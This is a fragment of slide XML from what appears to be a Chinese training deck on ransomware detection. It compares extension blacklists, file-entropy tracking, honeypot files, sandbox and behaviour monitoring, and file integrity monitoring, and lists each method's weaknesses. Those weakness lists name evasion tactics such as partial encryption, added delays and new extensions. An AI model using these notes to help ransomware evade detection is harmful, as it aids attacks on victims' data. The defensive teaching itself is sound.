            <a:ext cx="11444605" cy="6000750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>借助文件访问监控工具，组织可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将已知勒索软件的扩展名文件重命名操作列入黑名单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，或者使用这类扩展名的新文件一旦创建，就发出警报。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>比如说，Netapp的文件访问监控工具让你可以阻止某些类型的扩展名保存在存储系统和共享区上，比如WannaCry勒索软件（.wncry）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>研究人员已</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>针对勒索软件扩展名整理出众多列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，包括附有常见勒索软件扩展名的列表。可以较为方便的获取使用。不过此项检测手段也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>仅针对已知的勒索软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，对于勒索软件的变种防护能力较差。此手段可与用户部署的终端安全产品形成联动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•采用黑名单模式，检测误报率低；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•可较有效对付常见已知勒索软件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•可轻松绕过，难以识别采用新扩展名的勒索软件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•很难找到拥有扩展名黑名单功能的文件监控工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="323469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常见文件扩展名检测</a:t>
              </a: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8320" y="732790"/>
            <a:ext cx="10321290" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>在网络安全界，文件的熵是指一种测量随机性的特定指标，名为“香农熵”（Shannon Entropy）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>典型的文本文件有较低的熵，而加密或压缩的文件有较高的熵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。换句话说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" u="sng"/>
              <a:t>通过跟踪文件的数据变化率，安全人员就可以确定文件是否经过加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。使用文件熵可以实现检测并阻止加密个人文件的非法进程。测量文件熵的工具还可以在多次标记修改、出现重大变化后快速阻止恶意进程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•可以检测出静态引擎无法捕获的勒索软件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•误报率低于以上提到的动态检测手段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•对终端设备的CPU资源占用率高；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•文件将被加密，直至达到一定水平的可信度，因此无法阻止所有勒索破坏；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•如果攻击者仅加密文件的一部分或分块加密，可轻松绕过该检测模式。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="425196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测量文件数据的变化（熵）</a:t>
              </a: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8320" y="732790"/>
            <a:ext cx="10226040" cy="6000750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>蜜罐文件是故意放到共享文件夹/位置的虚假文件，以便检测可能存在的攻击者。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一旦蜜罐文件被打开，就发出警报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。比如说，一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwords.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的文件可以用作工作站上的蜜罐文件。目前，我国主流安全厂商推出的勒索软件防护方案中，都已采用此种方式进行防护，例如安天、安恒、奇安信、深信服等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>创建快速简便的蜜罐文件的一种常见方法是使用Canarytokens。Canarytokens是Canary 公司提供的一款免费工具，可将令牌（独特的标识符）嵌入到文档中，比如Microsoft Word、Microsoft Excel、Adobe Acrobat、图片和目录文件夹等更多文档中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•可以检测出静态引擎无法捕获的未知勒索软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•存在误报，因为某些合法程序和用户也可能接触诱饵文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•如果勒索软件跳过隐藏的文件/文件夹或攻击特定文件夹，即可绕过。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="153924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蜜罐文件</a:t>
              </a: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10435" y="259715"/>
            <a:ext cx="8755380" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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动态分析：行为数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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(API</a:t>
            </a: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、注册表、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439420" y="1099185"/>
            <a:ext cx="1981835" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rocess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>onitor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="439420" y="1467485"/>
            <a:ext cx="4707255" cy="3201035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129655" y="1042670"/>
            <a:ext cx="1981835" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>火绒剑</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="图片 101"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6048375" y="1439545"/>
            <a:ext cx="4958080" cy="3256915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650875" y="5601970"/>
            <a:ext cx="8621395" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>智能分析提取特征：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分片成序列、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>调用次数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10435" y="259715"/>
            <a:ext cx="8755380" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="082555"/>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动态分析：沙箱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7524750" y="2388235"/>
            <a:ext cx="4282440" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>行为监控：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>（1）跟踪恶意代码进程的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>调用；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>（2）监测运行过程中被恶意代码创建、删除和下载的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>（3）跟踪客户机产生的 PCAP 格式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>（4）获取恶意代码选定进程的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内存镜像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="图片 109"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="199390" y="1884680"/>
            <a:ext cx="6683375" cy="4382135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1686560" y="1381760"/>
            <a:ext cx="3489960" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cuckoo Sandbox</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98320" y="732790"/>
            <a:ext cx="9942195" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>监控文件系统以查找批量文件操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（比如重命名、写入或删除），安全人员也可以捕获实时发生的勒索软件攻击，甚至可以自动阻止攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>文件完整性监控（FIM）工具可以帮助你以这种方式检测勒索软件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FIM将文件的最新版本与已知、受信任的“基准版本”进行比对，以此验证和核实文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>；如果文件被篡改、更新或删除，就发出警报。动态监控文件操作需要有一套文件的保管清单。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•可以检测出静态引擎无法捕获的勒索软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•如果超过定义的限制阈值，文件可能会被加密，影响业务开展；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>•如果勒索软件在加密操作之间添加延迟，或生成多个进程来加密成批/成组文件，可轻松绕过该检测方式。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1888921" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2543606" y="42192"/>
              <a:ext cx="9648394" cy="781967"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="92000">
                  <a:srgbClr val="FFC000">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:srgbClr val="002060"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="0" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:no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 name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="3573780" cy="501650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
